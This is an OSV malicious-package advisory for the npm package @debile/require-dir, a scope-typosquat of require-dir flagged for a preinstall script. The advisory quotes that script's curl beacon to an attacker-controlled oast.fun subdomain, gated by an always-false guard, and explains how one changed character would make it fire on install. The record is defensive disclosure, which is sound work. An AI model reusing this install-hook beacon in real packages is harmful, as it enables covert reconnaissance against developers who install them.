MAL-2026-10654

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@debile/require-dir/MAL-2026-10654.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10654
Published
2026-07-15T04:32:04Z
Modified
2026-07-15T06:04:28.295463949Z
Summary
Malicious code in @debile/require-dir (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3075732c05c8b941b57fed9e8fe9c788b28f9ff6fe9ef91936d1802f568c594e)

Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi', which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle. The curl is gated behind an always-false [[ 1 == 2 ]] guard, so no request is actually issued on install of this version, but the preinstall hook, the attacker-controlled OAST subdomain, and the scope-typosquat of a popular package (require-dir) together form a dependency-confusion / install-time recon probe. Flipping a single character in the guard converts the current release into a live install-time beacon to an attacker-controlled interaction server.

Database specific
{
    "malicious-packages-origins": [
        {
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-010619",
            "import_time": "2026-07-15T05:49:44.13968795Z",
            "sha256": "21f83d8be7d017ab502834020238f7311220ea6123433fd93f97ef3cd3ee20cc",
            "versions": [
                "1.9.1"
            ],
            "modified_time": "2026-07-15T04:32:04Z"
        },
        {
            "id": "IN-MAL-2026-010620",
            "source": "amazon-inspector",
            "import_time": "2026-07-15T05:49:44.24387987Z",
            "sha256": "3075732c05c8b941b57fed9e8fe9c788b28f9ff6fe9ef91936d1802f568c594e",
            "versions": [
                "1.9.2"
            ],
            "modified_time": "2026-07-15T04:32:14Z"
        }
    ]
}
References
Credits

Affected packages

npm / @debile/require-dir

Package

Name
@debile/require-dir
View open source insights on deps.dev
Purl
pkg:npm/%40debile/require-dir

Affected ranges

Affected versions

1.*
1.9.1
1.9.2

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@debile/require-dir/MAL-2026-10654.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "0210cb6367bd5e780095e81111db99fab73b24afa59a716a69183117e91f7943",
            "tlsh": "00f04e51ce94d9a316c426c4ac694462a122894b8a58fc0ef3c3012d874d5ab127d179"
        }
    ]
}